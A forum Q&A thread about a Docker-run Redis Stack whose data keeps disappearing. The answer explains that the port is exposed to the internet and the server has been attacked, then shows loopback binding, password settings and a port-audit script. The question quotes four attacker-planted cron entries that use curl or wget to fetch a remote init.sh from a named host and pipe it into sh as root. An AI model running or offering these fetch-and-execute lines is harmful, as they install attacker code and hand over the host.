0

I have a Redis running in docker, started with the command:

docker run -d --restart unless-stopped -p 6379:6379 redis/redis-stack-server:latest

However, all data inside Redis, including the indexes, is deleted every 30 minutes. I don't know why this happens.

Could it be because the VPS I'm running the docker is very limited on resources?

The VPS spec is 1 core CPU, 1 GB RAM & swap and 20 GB storage. OS is Ubuntu 22.04. The VPS provider is RackNerd. I have run the same docker-redis on a VPS with the same specification on OVH without any problem.

I'm running Redis on Docker because I want to use the RediSearch functionality.

Every few hours, keys named backup1 backup2 backup3 backup4 would appear in redis. Here's the value for each of the keys:

backup1: */2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh
backup2: */3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh
backup3: */4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh
backup4: */5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh

Here's the docker logs:

root@racknerd-d76c238:~# docker logs b4bb752bcda8
8:C 08 Jan 2025 04:51:49.757 # WARNING Memory overcommit must be enabled! Without it, a background save or replication may fail under low memory condition. Being disabled, it can also cause failures without low memory condition, see https://github.com/jemalloc/jemalloc/issues/1328. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
8:C 08 Jan 2025 04:51:49.759 * oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
8:C 08 Jan 2025 04:51:49.759 * Redis version=7.4.1, bits=64, commit=00000000, modified=0, pid=8, just started
8:C 08 Jan 2025 04:51:49.759 * Configuration loaded
8:M 08 Jan 2025 04:51:49.761 * Increased maximum number of open files to 10032 (it was originally set to 1024).
8:M 08 Jan 2025 04:51:49.761 * monotonic clock: POSIX clock_gettime
8:M 08 Jan 2025 04:51:49.766 * Running mode=standalone, port=6379.
8:M 08 Jan 2025 04:51:49.768 * Module 'RedisCompat' loaded from /opt/redis-stack/lib/rediscompat.so
8:M 08 Jan 2025 04:51:49.790 * <search> Redis version found by RedisSearch : 7.4.1 - oss
8:M 08 Jan 2025 04:51:49.790 * <search> RediSearch version 2.10.5 (Git=2.10-e2f28a9)
8:M 08 Jan 2025 04:51:49.791 * <search> Low level api version 1 initialized successfully
8:M 08 Jan 2025 04:51:49.791 * <search> gc: ON, prefix min length: 2, min word length to stem: 4, prefix max expansions: 200, query timeout (ms): 500, timeout policy: return, cursor read size: 1000, cursor max idle (ms): 300000, max doctable size: 1000000, max number of search results: 10000,
8:M 08 Jan 2025 04:51:49.791 * <search> Initialized thread pools!
8:M 08 Jan 2025 04:51:49.793 * <search> Enabled role change notification
8:M 08 Jan 2025 04:51:49.793 * Module 'search' loaded from /opt/redis-stack/lib/redisearch.so
8:M 08 Jan 2025 04:51:49.804 * <timeseries> RedisTimeSeries version 11202, git_sha=5643fd4d6fcb1e9cf084fb2deb9285b08f4a6672
8:M 08 Jan 2025 04:51:49.805 * <timeseries> Redis version found by RedisTimeSeries : 7.4.1 - oss
8:M 08 Jan 2025 04:51:49.805 * <timeseries> loaded default CHUNK_SIZE_BYTES policy: 4096
8:M 08 Jan 2025 04:51:49.805 * <timeseries> loaded server DUPLICATE_POLICY: block
8:M 08 Jan 2025 04:51:49.805 * <timeseries> loaded default IGNORE_MAX_TIME_DIFF:0
8:M 08 Jan 2025 04:51:49.805 * <timeseries> loaded default IGNORE_MAX_VAL_DIFF:0.000000
8:M 08 Jan 2025 04:51:49.805 * <timeseries> Setting default series ENCODING to:compressed
8:M 08 Jan 2025 04:51:49.806 * <timeseries> Detected redis oss
8:M 08 Jan 2025 04:51:49.806 * Module 'timeseries' loaded from /opt/redis-stack/lib/redistimeseries.so
8:M 08 Jan 2025 04:51:49.816 * <ReJSON> Created new data type 'ReJSON-RL'
8:M 08 Jan 2025 04:51:49.818 * <ReJSON> version: 20803 git sha: unknown branch:unknown
8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V1 API
8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V2 API
8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V3 API
8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V4 API
8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V5 API
8:M 08 Jan 2025 04:51:49.819 * <ReJSON> Enabled diskless replication
8:M 08 Jan 2025 04:51:49.819 * Module 'ReJSON' loaded from /opt/redis-stack/lib/rejson.so
8:M 08 Jan 2025 04:51:49.819 * <search> Acquired RedisJSON_V5 API
8:M 08 Jan 2025 04:51:49.822 * <bf> RedisBloom version 2.8.2 (Git=unknown)
8:M 08 Jan 2025 04:51:49.823 * Module 'bf' loaded from /opt/redis-stack/lib/redisbloom.so
8:M 08 Jan 2025 04:51:49.832 * <redisgears_2> Created new data type 'GearsType'
8:M 08 Jan 2025 04:51:49.835 * <redisgears_2> Detected redis oss
8:M 08 Jan 2025 04:51:49.838 # <redisgears_2> could not initialize RedisAI_InitError
8:M 08 Jan 2025 04:51:49.838 * <redisgears_2> Failed loading RedisAI API.
8:M 08 Jan 2025 04:51:49.838 * <redisgears_2> RedisGears v2.0.20, sha='9b737886bf825fe29ddc2f8da81f73cbe0b4e858', build_type='release', built_for='Linux-ubuntu22.04.x86_64', redis_version:'7.4.1', enterprise:'false'.
8:M 08 Jan 2025 04:51:49.881 * <redisgears_2> Registered backend: js.
8:M 08 Jan 2025 04:51:49.890 * Module 'redisgears_2' loaded from /opt/redis-stack/lib/redisgears.so
8:M 08 Jan 2025 04:51:49.891 * Server initialized
8:M 08 Jan 2025 04:51:49.892 * Ready to accept connections tcp
8:M 08 Jan 2025 05:04:19.697 * DB saved on disk
8:M 08 Jan 2025 05:04:20.167 * <redisgears_2> Got a flush started event
8:M 08 Jan 2025 05:04:20.172 * DB saved on disk
8:M 08 Jan 2025 05:04:21.850 * DB saved on disk
8:M 08 Jan 2025 05:04:22.318 * DB saved on disk
8:M 08 Jan 2025 05:04:22.565 * <redisgears_2> Got a flush started event
8:M 08 Jan 2025 05:04:22.568 * DB saved on disk
8:M 08 Jan 2025 05:04:24.255 * DB saved on disk
8:M 08 Jan 2025 05:04:24.965 * DB saved on disk
8:M 08 Jan 2025 05:11:27.270 * <module> Scanning index idx:delivery in background
8:M 08 Jan 2025 05:11:27.270 * <module> Scanning index idx:delivery in background: done (scanned=0)
8:M 08 Jan 2025 05:11:27.270 * <module> Scanning index idx:ehailing in background
8:M 08 Jan 2025 05:11:27.271 * <module> Scanning index idx:ehailing in background: done (scanned=0)
8:M 08 Jan 2025 05:11:27.271 * <module> Scanning index idx:product in background
8:M 08 Jan 2025 05:11:27.271 * <module> Scanning index idx:product in background: done (scanned=0)
8:M 08 Jan 2025 05:46:37.355 * DB saved on disk
8:M 08 Jan 2025 05:46:37.746 * <redisgears_2> Got a flush started event
8:M 08 Jan 2025 05:46:37.750 * DB saved on disk
8:M 08 Jan 2025 05:46:39.517 * DB saved on disk
8:M 08 Jan 2025 05:46:39.910 * DB saved on disk
8:M 08 Jan 2025 05:46:40.104 * <redisgears_2> Got a flush started event
8:M 08 Jan 2025 05:46:40.107 * DB saved on disk
8:M 08 Jan 2025 05:46:41.466 * DB saved on disk
8:M 08 Jan 2025 05:46:42.050 * DB saved on disk
8:M 08 Jan 2025 06:21:30.817 * <module> Scanning index idx:business in background
8:M 08 Jan 2025 06:21:30.822 * <module> Scanning index idx:business in background: done (scanned=0)
8:M 08 Jan 2025 06:21:30.823 * <module> Scanning index idx:delivery in background
8:M 08 Jan 2025 06:21:30.825 * <module> Scanning index idx:delivery in background: done (scanned=0)
8:M 08 Jan 2025 06:21:30.826 * <module> Scanning index idx:ehailing in background
8:M 08 Jan 2025 06:21:30.827 * <module> Scanning index idx:ehailing in background: done (scanned=0)
8:M 08 Jan 2025 06:21:30.828 * <module> Scanning index idx:product in background
8:M 08 Jan 2025 06:21:30.831 * <module> Scanning index idx:product in background: done (scanned=0)
8:M 08 Jan 2025 06:46:43.095 * 1 changes in 3600 seconds. Saving...
8:M 08 Jan 2025 06:46:43.105 * Background saving started by pid 29
29:C 08 Jan 2025 06:46:43.123 * DB saved on disk
29:C 08 Jan 2025 06:46:43.124 * Fork CoW for RDB: current 0 MB, peak 0 MB, average 0 MB
8:M 08 Jan 2025 06:46:43.207 * Background saving terminated with success
  • Have you read the logs? Do they say anything? Commented Jan 8 at 6:55
  • @vidarlo I've added the docker logs Commented Jan 8 at 7:27
  • Why do you publish port 6379 on all host interfaces? Do you need external access to redis? Commented Jan 8 at 15:41
  • @BMitch I just followed the command from github.com/RediSearch/RediSearch Commented Jan 8 at 17:17

1 Answer

2

Congratulations, you're exposing redis on the internet, and someone has attacked it.

It's not your database server any more; someone is using it for their own purpose. You have to secure it, by configuring either strong authentication, or firewalling it so it's not accessible on the Internet.

  • Googled en2an and this seems to be the case.. but may I know how it happens? Because this instance of redis is running on docker, and I just ran it using the command above. But before that, I installed redis on the VPS (not using docker), could it be the attacker got the access from the first redis installation? Commented Jan 8 at 14:15
  • You've not secured the installation in any way. You need to secure it, by enabling authentication or firewalling it. Firewalling it is probably the most sensible action. Commented Jan 8 at 15:05
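
The two remedies named in the answer, applied to the question's `docker run` command, together with a check for containers that still publish the Redis port on a public interface. This is an added example, not part of the original answer; the container name `redis-stack` and the password file `/root/.redis_pass` are assumptions.

```shell
#!/bin/sh
# Added example; the container name and password-file path are assumptions.

# WEAK (command from the question): "-p 6379:6379" publishes Redis on every
# host interface (0.0.0.0 and [::]) and no password is configured.
#   docker run -d --restart unless-stopped -p 6379:6379 redis/redis-stack-server:latest

# HARDENED: publish on loopback only and require a password. REDIS_ARGS is the
# redis-stack image's variable for extra redis-server arguments.
run_redis_hardened() {
    pass_file="${1:-/root/.redis_pass}"   # assumed location, mode 0600
    docker run -d --name redis-stack --restart unless-stopped \
        -p 127.0.0.1:6379:6379 \
        -e REDIS_ARGS="--requirepass $(cat "$pass_file")" \
        redis/redis-stack-server:latest
}

# Audit: read `docker ps --format '{{.Names}}\t{{.Ports}}'` lines on stdin and
# print each container that publishes PORT on a non-loopback host address.
# Returns 1 if any such container is found, 0 otherwise.
exposed_containers() {
    port="${1:-6379}"
    awk -F'\t' -v port="$port" '
    {
        n = split($2, maps, /, */)
        for (i = 1; i <= n; i++) {
            # A published mapping looks like HOSTIP:HOSTPORT->PORT/proto;
            # a bare "6379/tcp" is not published and is skipped.
            if (maps[i] !~ ("->" port "/")) continue
            host = maps[i]
            sub(/:[0-9-]+->.*/, "", host)      # keep only the host address
            if (host !~ /^127\./ && host != "[::1]" && host != "::1") {
                print $1; found = 1; break
            }
        }
    }
    END { exit found ? 1 : 0 }'
}

# Constructed sample of `docker ps` output (not taken from the asker's host).
SAMPLE_PS="$(printf '%s\t%s\n' \
    redis-open  '0.0.0.0:6379->6379/tcp, :::6379->6379/tcp' \
    redis-local '127.0.0.1:6379->6379/tcp' \
    redis-net   '6379/tcp')"

if ! printf '%s\n' "$SAMPLE_PS" | exposed_containers 6379; then
    echo "the containers listed above publish 6379 beyond loopback"
fi
# Live check: docker ps --format '{{.Names}}\t{{.Ports}}' | exposed_containers 6379
```

Binding the published port to 127.0.0.1 matters even when a host firewall such as ufw is in place, because Docker installs its own iptables rules for published ports and that traffic does not pass through ufw's input rules.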
